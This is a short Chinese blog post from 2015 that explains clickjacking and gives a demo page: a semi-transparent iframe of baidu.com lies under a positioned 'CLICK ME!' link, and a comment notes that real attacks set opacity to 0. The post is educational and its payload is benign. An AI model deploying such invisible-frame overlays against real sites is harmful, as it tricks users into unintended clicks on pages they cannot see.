fbird

  博客园  :: 首页  :: 新随笔  :: 联系 :: 订阅 订阅  :: 管理

Clickjacking是web攻击的一种,具体可参考 http://drops.wooyun.org/papers/104

 

具体怎么实施一直没弄明白,因缘际会看到了一个实际的例子,实际上受益匪浅,拿出来共享一下。(代码就不解释了,解决方案也可以参考上面的链接)

<html>
   </head>
   <body>
     <style>
    iframe {
      width:800px;
      height:800px;
      position:absolute;
      top:0; left:0;
      filter:alpha(opacity=30); /* in real life opacity=0 */
      opacity:0.5;
    }    
    </style>
    
    <div>Click on the link to go shopping now:</div>
        
    <iframe src="http://www.baidu.com"></iframe>
    
    <strong><a href="http://www.bing.com/" target="_blank" height=200px style="position:relative;left:380px;top:140px; z-index:999">CLICK ME!</a></<strong>
    <div>Buy! Buy! Buy!</div>
</html>

 

posted on 2015-08-21 16:44  PonyTan  阅读(264)  评论(0编辑  收藏  举报